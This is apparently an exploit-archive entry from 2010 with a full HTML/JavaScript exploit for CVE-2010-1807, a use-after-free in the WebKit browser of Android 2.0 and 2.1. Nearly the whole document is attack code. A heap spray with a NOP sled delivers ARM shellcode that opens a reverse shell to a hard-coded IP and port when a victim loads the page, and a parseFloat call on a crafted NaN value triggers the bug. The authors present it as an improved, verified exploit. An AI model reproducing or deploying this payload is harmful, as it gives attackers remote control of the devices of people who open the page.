Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
# Published : 2010-11-15
# Author : Itzhak Avraham
# Previous Title : Camtron CMNC-200 IP Camera Directory Traversal Vulnerability
# Next Title : Trend Micro Internet Security 2010 ActiveX Remote Exploit (UfPBCtrl.DLL)

# Exploit Title: Android 2.0/2.1 Use-After-Free Remote Code Execution on
Webkit
# Date: 14/11/2010
# Author: Itzhak Avraham, mj
# Tested on: Droid 2.1
# CVE : CVE-2010-1807


*Better exploit (better rate and more flexible for changes, also shorter
shellcode) than what you have, plus, it's also verified. Enjoy!
More details at : *
http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html*


<html>
<head>
<script>
//This code is only for security researches/teaching purposes,use at your own risk!

// bug   =  webkit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
//patched=  android 2.2, some said it works on some devices with 2.2.
//originally noticed/written by mj(good job man!)
//new exploit version by Itzhak Zuk Avraham (itz2000[AT]GMAIL[DOT]COM) - http://imthezuk.blogspot.com

var ip = unescape("ua8c0u0100"); // ip = 192.168.0.1
var port = unescape("u3930"); //port 12345 (hex(0x3039))
//var ip = e.g: unescape("u000au0202"); //ip = 10.0.2.2

function trigger()
        {
  var span = document.createElement("div");
  document.getElementById("BodyID").appendChild(span);
  span.innerHTML = -parseFloat("NAN(ffffe00572c60)"); //trigger use-after-free
        }
function exploit()
        {    
 var nop = unescape("u33bcu0057"); //LDREQH R3,[R7],-0x3C for nopping
 do
 {
  nop+=nop;
 } while (nop.length<=0x1000);
        var scode = nop+unescape("u1001ue1a0u0002ue3a0u1001ue3a0u2005ue281u708cue3a0u708due287u0080uef00u6000ue1a0u1084ue28fu2010ue3a0u708due3a0u708eue287u0080uef00u0006ue1a0u1000ue3a0u703fue3a0u0080uef00u0006ue1a0u1001ue3a0u703fue3a0u0080uef00u0006ue1a0u1002ue3a0u703fue3a0u0080uef00u2001ue28fuff12ue12fu4040u2717udf80ua005ua508u4076u602eu1b6dub420ub401u4669u4052u270budf80u2f2fu732fu7379u6574u2f6du6962u2f6eu6873u2000u2000u2000u2000u2000u2000u2000u2000u2000u2000u0002");
 scode += port;
 scode += ip;
 scode += unescape("u2000u2000");
        target = new Array();
        for(i = 0; i < 0x1000; i++)
           target[i] = scode;
        for (i = 0; i <= 0x1000; i++)
        {
         document.write(target[i]+"<i>");
                if (i>0x999)
         {
          trigger();
         }
        }
}
</script>
</head>
<body id="BodyID">
Enjoy!
<script>
 exploit();
</script>
</body>
</html>

Twitter account : @ihackbanme